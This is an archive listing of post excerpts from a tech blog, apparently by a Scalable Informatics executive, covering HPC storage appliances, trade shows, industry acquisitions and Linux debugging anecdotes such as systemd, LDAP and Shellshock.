Oh no … we didn’t say “face melting” … did we? Oh. Yes. We. Did. The interview is here at the always wonderful InsideHPC.com You can see the video itself here on YouTube, but read Rich’s transcript. I was losing my voice, and he captured all of the interview in text. Take home messages: Insane IO/Networking/processing performance, small footprint, tiny price, available for orders now.
Posts
There are no silver bullets, 2015 edition
In Feb 2013, I opined (with some measure of disgust) that people were looking at various software packages as silver bullets, these magical bits of a stack which could suddenly transform massive steaming piles of bits (big … uh … “data” ?) into golden nuggets of actionable data. Many of the “solutions” marketed these days are exactly like that … “add our magic bean software to your pipeline and you will gain insight faster.
Posts
Shiny #HPC #storage things at #SC15
Assuming everything goes as planned (HA!) we should have a number of very cool things at SC15.
* 100Gb [Unison storage system with BeeGFS](https://scalableinformatics.com/unison) * 100Gb [Unison Ceph](https://scalableinformatics.com/unison) system * 100Gb connection to a partner/customer booth * Forte 100Gb is awesome. The first time I ran an iperf bidirectional test, saw 20GB/s … it blew me away. 40/56GbE is old hat now, and 10GbE is in the rapidly receding past.
Posts
Cat peeking out of bag: Schedule of presentations and talks in our booth for SC15 is up
I mentioned previously that we have some new (shiny) things … and it looks like you’ll be able to hear about them at my talk. See the schedule for timing information. This said, please note that we have a terrific line up of people giving talks:
Fintan Quill from Kx on kdb+ … which is an awesome market leading Big Data Time Series analytics and database tool that runs absolutely balls-out insanely fast on our architecture Christian Mohrbacher from Thinkparq on BeeGFS … the primary parallel file system we are leveraging for Unison parallel file system appliances * Mark Nelson from Inktank/Red Hat on Ceph … the reliable block and object storage system that we’ve built into our Unison Object/Block Storage appliance * Doug Eadline from Basement Supercomputing on Hadoop, and likely showing a Limulus deskside Hadoop appliance * Phil Mucci from Minimal Metrics on optimization problems for systems and code.
Posts
M&A: EMC gobbled by Dell
Need to think how this will play out. The Register’s take is here. It seems that this will solve the “shareholder value” problem indicated by Elliot Management (e.g. they wanted more return on their investment). As part of the increasing the return and value return to shareholders, EMC had been in a cost cutting mode. Layoffs have been in process, and likely products trimmed or refocused. Once this goes through (assuming regulators won’t protest), Dell will have
Posts
As the benchmark cooks
We are involved in a fairly large benchmark for a potential customer. I won’t go into many specifics, though I should note that lots of our Unison units are involved. Current architecture has 5 storage nodes (6th was temporarily removed to handle a customer issue). Each Unison node has a pair of 56GbE NICs, as well as our appliance OS, and bunches of other goodness (quite a bit of flash). Total capacity for test is of order 200TB of flash.
Posts
Been there, done that, even have a patent on it
I just saw this about doing a divide and conquer approach to massive scale genomics calculation. While not specific to the code in question, it looked familiar. Yeah, I think I’ve seen something like this before … and wrote the code to do it. It was called SGI GenomeCluster. It was original and innovative at the time, hiding the massively parallel nature of the computation behind a comfortable interface that end users already knew.
Posts
On storage unicorns and their likely survival or implosion
The Register has a great article on storage unicorns. Unicorns are not necessarily mythical creatures in this context, but very high valuation companies that appear to defy “standard” valuation norms, and hold onto their private status longer than those in the past. That is, they aren’t in a rush to IPO or get acquired.
The article goes on to analyze the “storage” unicorns, those in the “storage” field. They admix storage, nosql, hyperconverged, and storage as a service.
Posts
Imitation and repetition is a sincere form of flattery
A few years ago, we demonstrated some truly awesome capability in single racks and on single machines. We had one of our units (now at a customer site), specifically the unit that set all those STAC M3 records, showing this:
and a rack of our units (now providing high performance cloud service at a customer site)
for 8k random reads across 0.25 PB of storage on a very fast 40GbE backbone.
Posts
M&A [RUMOR]: Cisco grabs Nutanix
[update] TL;DR this appears to be rumor/speculation. One would think that such an acquisition would be prominent on Nutanix’s web site. Its April fools, in May. /sigh
Huge in the hyperconverged space (which, not so curiously, is where the day job is), and its setting up the battle lines between the major software/hardware players. Cisco was already number 5 hardware vendor, and was bragging about “beating the white boxes”. The last may be more wishful thinking than reality.
Posts
Booth at BioIT World 15 in Boston
Should be fun, we will have booth (#461) on the side near the thoroughfare for the talks. Our HPC on Wall Street booth looked like this:
[ ](/images/HPConWS-booth-spring2015.jpg)
The display on the monitor is from our FastPath Cadence machine, and is part of the performance dashboard, built upon InfluxDB, Grafana, sios-metrics, and influxdbcli. Here is a blown up view, note the vertical axes for BW (GB/s) and IOPs.
[ ](/images/cadence-dash-spring2015.jpg)
Posts
The worlds fastest hyper-converged appliance is faster and more affordable than ever
This is a very exciting hyper-converged system, representing our next generation of time series, and big data analytical systems. Tremendous internal bandwidths coupled with massive internal parallelism, and minimal latency design on networks. This unit has been designed to focus upon delivering the maximal performance possible in an as minimal footprint … both rack based and cost wise … as possible. You can use these as independent stand alone units, integrate them into a larger FastPath Unison system We have our software stack (SIOS) integrated onto each unit, and include our builds of Python + Pandas/SciPy/NumPy, R, and Perl.
Posts
Interesting Q1 so far for day job
Our Q1 is usually quiet, fairly low key. Not this one. Looks like lots of pent up demand. We are deep into record territory, running 200+% of normal, with possibility of more. Another new wrinkle is that our small investment round is mostly complete. This is new territory for us, and you may have noticed I’d backed off posting intensity over the last half year or so while this was going on.
Posts
When the revolution hits in force ...
Our machines will be there, helping power the genomics pipelines to tremendous performance. Performance is an enabling feature. Without it you cannot even begin to hope to perform massive scale analytics. With it, you can dream impossible dreams. This article came out talking about a massive performance analytics pipeline at Nationwide Children’s Hospital in Ohio. This pipeline runs on a cluster attached to Scalable Informatics FastPath Unison storage. This is a very dense, very fast system, interconnected with Mellanox FDR Infiniband, Chelsio 40GbE, and leveraging BeeGFS from thinkparq.
Posts
Inventory reduction @scalableinfo
Its that time of year, when the inventory fairies come out and begin their counting. Math isn’t hard, but the day job would like a faster and easier count this year. So, the day job is working on selling off existing inventory. We have 4 units ready to go out the door to anyone in need of 70-144TB usable storage at 5-6 GB/s per unit. Specs are as follows:
16-24 processor cores 128 GB RAM 48x {2,3,4} TB top mount drives 4x rear mount SSDs (OS/metadata cache) Scalable OS (Debian Wheezy based Linux OS) 3 year warranty As this is inventory reduction, the more inventory you take, the happier we are (and the less work that the inventory fairies have to do).
Posts
Starting to come around to the idea that swap in any form, is evil
Here’s the basic theory behind swap space. Memory is expensive, disk is cheap. Only use the faster memory for active things, and aggressively swap out the less used things. This provides a virtual address space larger than physical/logical memory. Great, right? No. Heres why.
swap makes the assumption that you can always write/read to persistent memory (disk/swap). It never assumes persistent memory could have a failure. Hence, if some amount of paged data on disk suddenly disappeared, well … Put another way, it increases your failure likelihood, by involving components with higher probability of failure into a pathway which assumes no failure.
Posts
30TB flash disk, Parallel File System, massive network connectivity
This will be fun to watch run …
Scalable Informatics FastPath Unison for the win!
Posts
SC14 T minus 6 and counting
Scalable’s booth is #3053. We’ll have some good stuff, demos, talks, and people there. And coffee. Gotta have the coffee. More soon, come by and visit us!
Posts
massive unapologetic firepower part 2 ... the dashboard ...
For Scalable Informatics Unison product. The whole system:
[ ](/images/dash-2.png)
Watching writes go by:
[ ](/images/dash-3.png)
Note the sustained 40+ GB/s. This is a single rack sinking this data, and no SSDs in the bulk data storage path. This dashboard is part of the day job’s FastPath product.
Posts
Updated boot tech in Scalable OS (SIOS)
This has been an itch we’ve been working on scratching a few different ways, and its very much related to forgoing distro based installers. Ok, first the back story. One of the things that has always annoyed me about installing systems has been the fundamental fragility of the OS drive. It doesn’t matter if its RAIDed in hardware/software. Its a pathway that can fail. And when it fails, all hell breaks loose.
Posts
Soon ... 12g goodness in new chassis
This is one of our engineering prototypes that we had to clear space for. A couple of new features I’ll talk about soon, but you should know that these are 12g SAS machines (will do 6g SATA of course as well).
Front of unit:
[ ](/images/IMG_2330.JPG)
Note the new logo/hand bar. The rails are also brand new, and are set to enable easy slide in/out even with 100+ lbs of disk in them.
Posts
Massive, unapologetic, firepower: 2TB write in 73 seconds
A 1.2PB single mount point Scalable Informatics Unison system, running an MPI job (io-bm) that just dumps data as fast as the little Infiniband FDR network will allow. Our test case. Write 2TB (2x overall system memory) to disk, across 48 procs. No SSDs in the primary storage. This is just spinning rust, in a single rack. This is performance pr0n, though safe for work.
usn-01:/mnt/fhgfs/test # df -H /mnt/fhgfs/ Filesystem Size Used Avail Use% Mounted on fhgfs_nodev 1.
Posts
Doing what we are passionate about
I am lucky. I fully admit this. There are people out there whom will tell you that its pure skill that they have been in business and been successful for a long time. Others will admit luck is part of it, but will again, pat themselves on the back for their intestinal fortitude. Few will say “I am lucky”. Which is a shame, as luck, timing (which you can never really, truly, control), and any number of other factors really are critical to one being able to have the luxury of doing what we are doing.
Posts
We had a record setting, knock the barn doors down year last year
… and believe it or not, I forgot to mention it. This is the first time in company history that we had a backlog going into Q1. Orders being built and tested on the last work day of the year. We grew, not the amount we had originally forecast, but we understand why (and sadly have little control over that aspect). We are working very hard on our appliances … I am blown away as to how perfect a fit they are for folks.
Posts
Day job at HPC on Wall Street on Monday the 9th
We’ll be showing off 2 appliances, with a change of what we are showing/announcing on one due to something not being ready on the business side. The first one is our little 108 port siRouter box. Think ‘bloody fast NAT’ and SDN in general, you can run other virtual/bare metal apps atop it.
The second will be a massive scale parallel SQL DB appliance. Usable for big data, hadoop like workloads, and other similar workloads more commonly used on other well known platforms.
Category: bugs
Posts
What reduces risk ... a great engineering and support team, or a brand name ?
I’ve written about approved vendors and “one throat to choke” concept in the past. The short take from my vantage point as a small, not well known, but highly differentiated builder of high performance storage and computing systems … was that this brand specific focus was going to remove real differentiated solutions from market, while simultaneously lowering the quality and support of products in market. The concept of brand and marketing of a brand is about erecting barriers to market entry against the smaller folk whom might have something of interest, and the larger folk who might come in with a different ecosystem.
Posts
On hackerrank and Julia
My new day job has me developing considerably less code than my previous endeavor, so I like to work on problems to keep these particular muscles in steady use. Happily, I get to do more analytics than ever before, so this at least is some compensation for the lower amount of coding. When I work on coding for myself, I’ll play with problems from my research days, or small throw-away ones, like on Hackerrank.
Posts
That was fun: mysql update nuked remote access
Update your packages, they said. It will be more secure, they said. I guess it was. No network access to the databases. Even after turning the database server instance to listen again on the right port, I had to go in and redo the passwords and privileges. So yeah, this broke my MySQL instance for a few hours. Took longer to debug as it was late at night and I was sleepy, so I put it off until morning with caffeine.
Posts
when you eliminate the impossible, what is left, no matter how improbable, is likely the answer
This is a fun one. A customer has quite a collection of all-flash Unison units. A while ago, they asked us to turn on LLDP support for the units. It has some value for a number of scenarios. Later, they asked us to turn it off. So we removed the daemon. Unison ceased generating/consuming LLDP packets. Or so we thought. Fast forward to last week. We are being told that LLDP PDUs are being generated by the kit.
Posts
Another fun bit of debugging
Ok … so here you are doing a code build. Your environment is all set. You have ample space. Lots of CPU, lots of RAM. All packages are up to date. You start your make. You have another window open with dstat running, just to kinda, sorta watch the system, while you are doing other things. And while you are working, you realize dstat has stopped scrolling. Strange, why would that be.
Posts
strace -p is your friend
So there I was, trying to use a serial port on a node which was connected to a serial port on a switch. Which I needed to properly configure the switch. So I light up minicom and get garbage. Great, a baud rate mismatch, easily fixed. Fix it. Connect again. I get the first 10-12 characters … and then garbage. Hmmm. I’d like to pause our story for a moment, and say I had the key insight at this moment … but that would not be true.
Posts
Finding unpatched "features" in distro packages
I generally expect baseline distro packages to be “old” by some measure. Even for more forward thinking distros, they generally (mis)equate age with stability. I’ve heard the expression “bug for bug compatible” when dealing with newer code on older systems. Something about the devil you know vs the devil you don’t. Ok. In this case, Cmake. A good development tool, gaining popularity over autotools and other things. Base SIOS image is on Debian 8.
Posts
Excellent article on mistakes made for infrastructure ... cloud jail is about right
Article is here at Firstround capital. This goes to a point I’ve made many many times to customers going the cloud route exclusively rather than the internal infrastructure route or hybrid route. Basically it is that the economics simply don’t work. We’ve used a set of models based upon observed customer use cases, and demonstrated this to many folks (customers, VCs, etc.) Many are unimpressed until they actually live the life themselves, have the bills to pay, and then really … really grok what is going on.
Posts
I don't agree with everything he wrote about systemd, but he isn't wrong on a fair amount of it
Systemd has taken the linux world by storm. Replacing 20-ish year old init style processing for a more legitimate control plane, and replacing it with a centralized resource to handle this control. There are many things to like within it, such as the granularity of control. But there are any number of things that are badly broken by default. Actually some of these things are specifically geared towards desktop users (which isn’t a bad thing if you are a desktop linux user, as I am).
Posts
Systemd and non-desktop scenarios
So we’ve been using Debian 8 as the basis of our SIOS v2 system. Debian has a number of very strong features that make it a fantastic basis for developing a platform … for one, it doesn’t have significant negative baggage/technical debt associated with poor design decisions early on in the development of the system as others do. But it has systemd. I’ve been generally non-committal about systemd, as it seemed like it should improve some things, at a fairly minor cost in additional complexity.
Posts
You can't win
Like that old joke about the patient going to the Doctor for a pain …
Imagine if you will, a patient whom, after being told what is wrong, and why it hurts, and what to do about it, continues to do it. And be more intensive about doing it. And then complains when it hurts. This is a rough metaphor for some recent support experiences. We do our best to convince them not to do the things that cause them pain, as in this case, they are self-inflicted.
Posts
That was fun ... no wait ... the other thing ... not fun
Long overdue update of the server this blog runs on. It is no longer running a Ubuntu flavor, but instead running SIOSv2 which is the same appliance operating system that powers our products. This isn’t specifically a case of eating our own dog-food, but more a case that Ubuntu, even the LTS versions, have a specific sell by date, and it is often very hard to update to the newer revs.
Posts
Best practice or random rule ... diagnosing problems and running into annoyances
As often as not, I’ll hear someone talk about a “best practice” that they are implementing or have implemented. Things that run counter to these “best practices” are obviously, by definition, “not best”. What I find sometimes amusing, often alarming, is that the “best practices” are often disconnected from reality in specific ways. This is not a bash on all best practices, some of them are sane, and real. Like not allowing plain text passwords for logins.
Posts
It is 2016 ... why am I fighting with LDAP authentication in linux? Why doesn't it just work?
Ok … very long story that boils down to us trying to help a customer out. I am trying to avoid the “lets just add another user to /etc/passwd” or similar such thing. And they aren’t quite ready to hook into AD or similar. So we have this issue. I want to enable their nodes to use ldap. I’ve done this before for other customers with older tools (pam_ldap, etc.). But it was somewhat crazy (as in non-trivial), involving gnashing of teeth, gums, etc.
Posts
The joys of automated tooling ... or ... catching changes in upstream projects workflows by errors in yours
We have an automated build process for our boot images. It is actually quite good, allowing us to easily integrate many different capabilities with it. These capabilities are usually encapsulated in various software stacks that provide specific functionality. Most of these stacks follow pretty well defined workflows. For a number of reasons, we find building from source generally easier than package installation, as there are often some, well, effectively random (and often poor) choices in build options/file placement in the package builds.
Posts
Not a fan of device mapper in Linux
Yeah, I know. It brings all manner of capabilities with it. Its just the cost of these capabilities, when combined with other tools, like, say, Docker, that make me not want to use it. To wit:
root@ucp-01:~# ls -alF /var/lib/docker/devicemapper/devicemapper/ total 52508 drwx------ 2 root root 80 Jan 29 22:38 ./ drwx------ 4 root root 80 Jan 29 22:38 ../ -rw------- 1 root root 107374182400 Jan 29 22:39 data -rw------- 1 root root 2147483648 Jan 29 22:39 metadata root@ucp-01:~# ls -halF /var/lib/docker/devicemapper/devicemapper/ total 52M drwx------ 2 root root 80 Jan 29 22:38 .
Posts
When infinite resources aren't, and why software assumes they are infinite
We’ve got customers with very large resource machines. And software that sees all those resources and goes “gimme!!!!”. So people run. And then more people use it. And more runs. Until the resources are exhausted. And hilarity (of the bad kind) ensues. These are firedrills. I get an open ticket that “there must be something wrong with the hardware”, when I see all the messages in console logs being pulled in from ICL saying “zOMG I am out of ram ….
Posts
A wonderful read on metrics, profiling, benchmarking
Brendan Gregg’s writings are always interesting and informative. I just saw a link on hacker news to a presentation he gave on “Broken Performance Tools”. It is wonderful, and succinctly explains many thing I’ve talked about here and elsewhere, but it goes far beyond what I’ve grumbled over. One of my favorite points in there is slide 83. “Most popular benchmarks are flawed” and a pointer to a paper (easy to google for).
Posts
diagnostics
This is something of a hard post to write, for a number of reasons, not the least of which is that the topic comes as something of a surprise to me. I am just going to state it, and then discuss it. The vast majority of people (and companies) out there, whom think they know something of hardware/software/system level diagnostics and problem identification (from newbie to “veteran”) are either full of it, or really clueless.
Posts
love/hate relationship with new hardware
One of the dangers of dealing with newer hardware is often that, it doesn’t work so well. Or the drivers get hosed in mysterious ways. We’ve got some nice shiny new 10GbE cards for a set of Unison systems going into a customer next week. We had some very odd issues with other 10GbE cards, so we rolled over to newer design cards. Younger silicon, younger design. Newer kernel module. I can’t say I am enjoying this experience thus far.
Posts
Real measurement is hard
I had hinted at this last week, so I figure I better finish working on this and get it posted already. The previous bit with language choice wakeup was about the cost of Foreign Function Interfaces, and how well they were implemented. For many years I had honestly not looked as closely at Python as I should have. I’ve done some work in it, but Perl has been my go-to language.
Posts
Anatomy of a #fail ... the internet of broken software stacks
So I’ve been trying to diagnose a problem with my Android devices running out their batteries very quickly. And at the same time, I’ve been trying to understand why my address bar on Thunderbird has taken a very long time to respond. I had made a connection earlier today when I had noticed the 50k+ contacts in my contact list, of which maybe 2000 were unique. I didn’t quite understand it.
Posts
Drivers developed largely out of kernel, and infrequently synced
One of the other aspects of what we’ve been doing has been forward porting drivers into newer kernels, fixing the occasional bug, and often rewriting portions to correct interface changes. I’ve found that subsystem vendors seem to prefer to drop code into the kernel very infrequently. Sometimes once every few years are they synced. Which leads to distro kernels having often terribly broken device support. And often very unstable device support.
Posts
Amusing #fail
I use Mozilla’s thunderbird mail client. For all its faults, it is still the best cross platform email system around. Apple’s mail client is a bad joke and only runs on apple devices (go figure). Linux’s many offerings are open source, portable, and most don’t run well on my Mac laptop. I no longer use Windows apart from running in a VirtualBox environment. And I would never go back to OutLook anyway (used it once, 15 years ago or so … never again).
Posts
Systemd, and the future of Linux init processing
An interesting thing happened over the last few months and years. Systemd, a replacement init process for Linux, gained more adherents, and supplanted the older style init.d/rc scripting in use by many distributions. Ubuntu famously abandoned init.d style processing in favor of upstart and others in the past, and has been rolling over to systemd. Red Hat rolled over to Systemd. As have a number of others. Including, surprisingly, Debian. For those whom don’t know what this is, think of it this way.
Posts
And the 0.8.3 InfluxDB no longer works with the InfluxDB perl module
I ran into this a few weeks ago, and am just getting around to debugging it now. Traced the code, set up a debugger and followed the path of execution, and … and … Yup, its borked. So, I can submit a patch or 3 against the InfluxDB code, or roll a simpler more general Time Series Data Base interface that will talk to InfluxDB. And eventually kdb+. Since I wanted to code for that as well, I am looking more seriously at the second option.
Posts
Shellshock is worse than heartbleed
In part because, well, the patches don’t seem to cover all the exploits. For the gory details, look at the CVE list here. Then cut and paste the local exploits. Even with the latest patched source, built from scratch, there are active working compromises. With heartbleed, all we had to do was nuke keys, patch/update packages, restart machines, cross fingers. This is worse, in that the fixes … well … don’t.
Category: business
Posts
Opening keynote @Supercomputing #SC18 : #HPC is an enabling technology ...
… Ok, the speaker said far more than that. But one of his central theses is that in this “second” machine revolution, we are enabling data driven decision making, distributed decision and consensus, as well as expanding beyond the confines of specific expertise in a field. The latter I’ve heard described as cross fertilization … gather a bunch of smart people “together” and give them a problem spec. Let them run with it.
Posts
#HPC in all the things
I read this announcement this morning. Our friends at Facebook releasing their reduced precision server side convolution and GEMM operations.
Many years ago, I tried to convince people that HPC moves both down market, into lower cost hardware, as well as more widely into more software toolchains. Basically, the decades of experience building very high performance applications and systems will have value downstream for many users over time.
GEMM is a generalized approach to a matrix multiply, which has been well optimized for HPC applications in various scientific libraries over time.
Posts
Looking forward to #SC18 next week and a discussion of all things #HPC
I’m attending SC18 next week. It’s been 3 years since I last attended (2015). Then we (@scalableinfo) had a large booth, lots of traffic, and showed off some of the first commercial NVMe high performance storage systems running BeeGFS over 100GbE.
I am looking forward to talking with as many people as I can, to get their perspectives on things. To see what they are thinking, hear what they are doing, and in which direction they are going.
Posts
So I've got ideas for two businesses
Neither one is a computer related. Both are based upon what I see as unmet needs for various groups. One is a definitely “gotta have” for one group. The other group, there is one “solution” on the market that I looked at, and it’s pretty pathetic. The other uses technology where it should be using chemistry, as the tech is simply way too expensive for mass use, and quite inflexible. Both are B2C.
Posts
Typecasting and the "trust us" factor
Finding myself on the other side of the table in the consumer-vendor relationship has resulted in some eye opening experiences. These are things I look back on, and realize that I strenuously avoided doing during my Scalable days. But I see everyone doing it now, as they try to sell me stuff, or convince me to use things. One of the eye opening things is a bit of typecasting of sorts.
Posts
On technology zealotry
I’ve encountered this in my career, at many places. Sadly, early in my career, I participated in some of this. You are a zealot for a particular form of tech if you can see it do no wrong, and decry reports of issues or problems as “attacks”. You are a zealot against a particular form of tech if you cannot see it as a potentially useful and valuable portion of a solution stack, and (often gleefully) amplify reports of issues or problems.
Posts
M&A and business things
First up, Tegile was acquired by Western Digital (WDC). This is in part due to WDC’s desire to be a one stop shop vertically integrated supplier for storage parts, systems, etc. This is how all of the storage parts OEMs needed to move, though Seagate failed to execute this correctly, selling off their array business in part to Cray. Toshiba … well … they have some existential challenges right now, and are about to sell off their profitable flash and memory systems business, if they can just get everyone to agree … This comes from the fact that spinning disk, while a venerable technology, has been effectively completely commoditized.
Posts
Cray "acquires" ClusterStor business unit from Seagate
Information at this link. It is being called a “strategic transaction”, though it likely came about vis-a-vis Seagate doing some profound and deep thinking over what business it was in. Seagate has been weathering a storm, and has been working on re-orgs to deal with a declining disk market. They acquired ClusterStor as part of a preceding transaction of Xyratex. Xyratex was the basis for the Cray storage platforms (post Enginio).
Posts
What reduces risk ... a great engineering and support team, or a brand name ?
I’ve written about approved vendors and “one throat to choke” concept in the past. The short take from my vantage point as a small, not well known, but highly differentiated builder of high performance storage and computing systems … was that this brand specific focus was going to remove real differentiated solutions from market, while simultaneously lowering the quality and support of products in market. The concept of brand and marketing of a brand is about erecting barriers to market entry against the smaller folk whom might have something of interest, and the larger folk who might come in with a different ecosystem.
Posts
Selling #HPC things on ebay
Given that the (now former) day job has ended, I am selling some of the old day job’s assets on ebay. We’ve sold some siFlash, Unison, and have current listings for Arista and Mellanox switches. More stuff will be listed in short order, check it out here. Feel free to reach out to me at joe.landman at the google mail thingy if you want to talk about any of these things, or buy before I list them.
Posts
I always love these breathless stories of great speed, and how VCs love them ...
Though, when I look at the “great speed”, it is often on par with or less than Scalable Informatics sustained years before. From 2013 SC13 show, on the show floor, after blasting through a POC at unheard of speed, and setting long standing records in the STAC-M3 benchmarks …
Article in question is in the Register. Some of the speeds and feeds:
* 200 microsecs latency * 45GBps read bandwidth * 15GBps write bandwidth * 7 million IOPS But then … a fibre connection.
Posts
Some updates coming soon
I should have something interesting to talk about over the next two weeks, though a summary of this is Scalable Informatics is undergoing a transformation. The exact form of this transformation is still being determined. In any case, I am no longer at Scalable. Some items of note in recent weeks.
M&A;: Nimble was purchased by HPE. Not sure of the specifics of “why”, other than HPE didn’t have much in this space.
Posts
Brings a smile to my face ... #BioIT #HPC accelerator
Way way back in the early aughts (2000’s), we had built a set of designs for an accelerator system to speed up things like BLAST, HMMer, and other codes. We were told that no one would buy such things, as the software layer was good enough and people didn’t want black boxes. This was part of an overall accelerator strategy that we had put together at the time, and were seeking to raise capital to build.
Posts
A nice shout out in ComputerWeekly.com about @scalableinfo #HPC #storage
See the article here.
They mention Axellio, and on The Reg article on their ISE product, they say “X-IO partners using Axellio will be able to compete with DSSD, Mangstor and Zstor and offer what EMC has characterised as face-melting performance.” Hey, we were the first to come up with “face melting performance”. More than a year ago. And it really wasn’t us, but my buddy Dr. James Cuff of Harvard.
Posts
SSD/flash/memory shortage, day N+1
There has been a huge demand of SSD/Flash/memory components from a number of end users. Sadly not the day jobs customers … but enough to deplete the market of supply. Watching basic economics at work is fascinating. Supply is highly constrained, while demand is rising. Couple that with a (mis)expectation of continuous falling prices across the board leads to interesting conversations with customers. We’ve tried to set expectations appropriately, but we’ve been bitten in the past by doing just this.
Posts
Architecture matters, and yes Virginia, there are no silver bullets for performance
Time and time again, the day job had been asked to discuss how the solutions are differentiated. Time and time again, we showed benchmarks on real workloads that show significant performance deltas. Not 2 or 3 sigma measurements. More often than not, 2x -> 10x better. Yet … yet … we were asked, again and again, how we did it. We pointed to our architecture. But, they complained, isn’t it the same as X (insert your favorite volume vendor here)?
Posts
ClusterHQ dies
ClusterHQ is now dead. They were an early container play, building a number of tools around Docker/etc. for the space. Containers are a step between bare metal and VMs. FLocker (ClusterHQ’s product) is open source, and they were looking to monetize it in a different way (not on acquisition, but on support). In this space though, Kubernetes reigns supreme. So competing products/projects need to adapt or outcompete. And its very hard to outcompete something like k8s.
Posts
Violin files for Chapter 11
This has been long in coming. I feel for the people involved. Violin makes proprietary flash modules and chassis, to provide an all flash “array”. The performance is somewhat “meh”, and the cost is high. Like most of the rest of the companies in this space, their latest model bits are quite a bit below Scalable’s 4 year old models, never mind the new stuff. Since the IPO, they’ve been on something of a monotonic down-direction in share price.
Posts
So it seems Java is not free
This article on The Register indicates that Oracle is now working actively to monetize java use. Given the spate of java hacks over the years, and the decidedly non-free nature of the language, I suspect we are going to see replacement development language use skyrocket, as people develop in anything-but-Java going forward. Think about the risks … you have a massive platform that people have been using with a fairly large number of compromises (client side certainly) … and now you need to start paying for the privilege of using the platform.
Posts
On closure
I work with many people, have regular email and phone contact with them, as well as occasional face to face meetings. We talk ideas back and forth, develop plans. I work on designs, coordinating everything that goes into those designs (usually built upon our kit). I work hard on my proposals, thinking many things through, developing very detailed plans. I share these with the people … our customers. And then the pinging begins.
Posts
On expectations
This has happened multiple times over the last few months. Just variations on the theme as it were, so I’ll talk about the theme. The day job builds some of the fastest systems for storage and analytics in market. We pride ourselves on being able to make things go very … very fast. If its slow, IMO, its a bug. So we often get people contacting us with their requirements. These requirements are often very hard for our competitors, and fairly simple for us to address.
Posts
Excellent article on mistakes made for infrastructure ... cloud jail is about right
Article is here at Firstround capital. This goes to a point I’ve made many many times to customers going the cloud route exclusively rather than the internal infrastructure route or hybrid route. Basically it is that the economics simply don’t work. We’ve used a set of models based upon observed customer use cases, and demonstrated this to many folks (customers, VCs, etc.) Many are unimpressed until they actually live the life themselves, have the bills to pay, and then really … really grok what is going on.
Posts
Seagate and ClusterStor: a lesson in not jumping to conclusions based on what was not said
I saw this analysis this morning on the Register’s channel site. This follows on the announcement of other layoffs and shuttering of facilities. A few things. First a disclosure: arguably, the day job and more specifically our Unison product is in “direct” competition with ClusterStor, though we never see them in deals. This may or may not be a bad thing, and likely more due to market focus (we do big data, analytics, insanely fast storage in hyperconverged packages) than anything else.
Posts
M&A: Vertical integration plays
Two items of note here. First, Cavium acquires qlogic. This is interesting at some levels, as qlogic has been a long time player in storage (and networking). There are many qlogic FC switches out there, as well as some older Infiniband gear (pre-Intel sale). Cavium is more of a processor shop, having built a number of interesting SoC and general purpose CPUs. I am not sure the combo is going to be a serious contender to Intel or others in the data center space, but I think they will be working on carving out a specific niche.
Posts
Attempting, and to some degree, failing, to prevent a user from accruing technical debt
We strive to do right by our customers. Sometimes this involves telling them unpleasant truths about choices they are going to make in the future, or have made in the past. I try not to overly sugar coat things … I won’t be judgemental … but I will be frank, and sometimes, this doesn’t go over well. During these discussions, I often see people insisting that their goal is X, but the steps Y to get there, will lead them to Z, which is not coincident with X.
Posts
"No, really, we are different than all the others you worked with"
Thus ended the plaintive cry of a management consulting hawking their wares, promising us high level meetings with “customers” with “budgets” in our space. This isn’t to say we don’t want more customers, we do. We always need more (and repeat) customers … this is the nature of our business. What we don’t need is pay-for-play. There is no shared risk, no incentive for the management consultant to deliver a set of business, as they are being paid, and that … the pay for play, is their business.
Posts
VC landscape changing: Intel Capital on the market
Saw this in a post on VentureBeat. Intel Capital has been an important player in the space for a while. What happens next to them is worth paying attention to. They’ve been in the thick of many interesting companies, though usually outside of Intel’s core foci. Somewhat beyond the normal corporate strategic VC roles. This could change a number of things for startups … new and existing. VCs have been sitting on the sidelines, or being less active over the recent past, and this is likely not to help the situation.
Posts
Nutanix files for IPO
Short story here. I am not going to pour over their S-1 form to find interesting tidbits, others will do that, and are paid to do so. They are the first of several, though I had thought that Dell would acquire them before they hit IPO. I am guessing that the combination of the price for them, plus the EMC acquisition stopped this conversation. So now Nutanix is going to IPO.
Posts
M&A: NetApp grabs SolidFire
This one has been in the rumor mill for a while. NetApp has been needing something to play well in the all flash array space, and it now has something. This said, the array space is very much on the decline certainly with respect to dumb JBODs and smart “filer heads”. That design is being retired in favor of smarter and hyperconverged systems. Such as Unison with Ceph, Forte, and related HCI (hyper converged infrastructure) systems.
Posts
Video interview: face melting performance in #hpc #nvme #storage @scalableinfo
Oh no … we didn’t say “face melting” … did we? Oh. Yes. We. Did. The interview is here at the always wonderful InsideHPC.com You can see the video itself here on YouTube, but read Rich’s transcript. I was losing my voice, and he captured all of the interview in text. Take home messages: Insane IO/Networking/processing performance, small footprint, tiny price, available for orders now.
Posts
There are no silver bullets, 2015 edition
In Feb 2013, I opined (with some measure of disgust) that people were looking at various software packages as silver bullets, these magical bits of a stack which could suddenly transform massive steaming piles of bits (big … uh … “data” ?) into golden nuggets of actionable data. Many of the “solutions” marketed these days are exactly like that … “add our magic bean software to your pipeline and you will gain insight faster.
Posts
Shiny #HPC #storage things at #SC15
Assuming everything goes as planned (HA!) we should have a number of very cool things at SC15.
* 100Gb [Unison storage system with BeeGFS](https://scalableinformatics.com/unison) * 100Gb [Unison Ceph](https://scalableinformatics.com/unison) system * 100Gb connection to a partner/customer booth * Forte 100Gb is awesome. The first time I ran an iperf bidirectional test, saw 20GB/s … it blew me away. 40/56GbE is old hat now, and 10GbE is in the rapidly receding past.
Posts
Cat peeking out of bag: Schedule of presentations and talks in our booth for SC15 is up
I mentioned previously that we have some new (shiny) things … and it looks like you’ll be able to hear about them at my talk. See the schedule for timing information. This said, please note that we have a terrific line up of people giving talks:
Fintan Quill from Kx on kdb+ … which is an awesome market leading Big Data Time Series analytics and database tool that runs absolutely balls-out insanely fast on our architecture Christian Mohrbacher from Thinkparq on BeeGFS … the primary parallel file system we are leveraging for Unison parallel file system appliances * Mark Nelson from Inktank/Red Hat on Ceph … the reliable block and object storage system that we’ve built into our Unison Object/Block Storage appliance * Doug Eadline from Basement Supercomputing on Hadoop, and likely showing a Limulus deskside Hadoop appliance * Phil Mucci from Minimal Metrics on optimization problems for systems and code.
Posts
Are the wheels coming off?
From Term Sheet (required reading BTW)
Read it all. The thing about bubble valuations and unicorns … neither one will last very long. Pure Storage IPOed this week and they aren’t doing as well in the public markets as their private market valuations might suggest. This is not to say they aren’t a good company, or don’t have a good product. This is saying that the demand for “unicorn” valuations from the buy side is … well … weak.
Posts
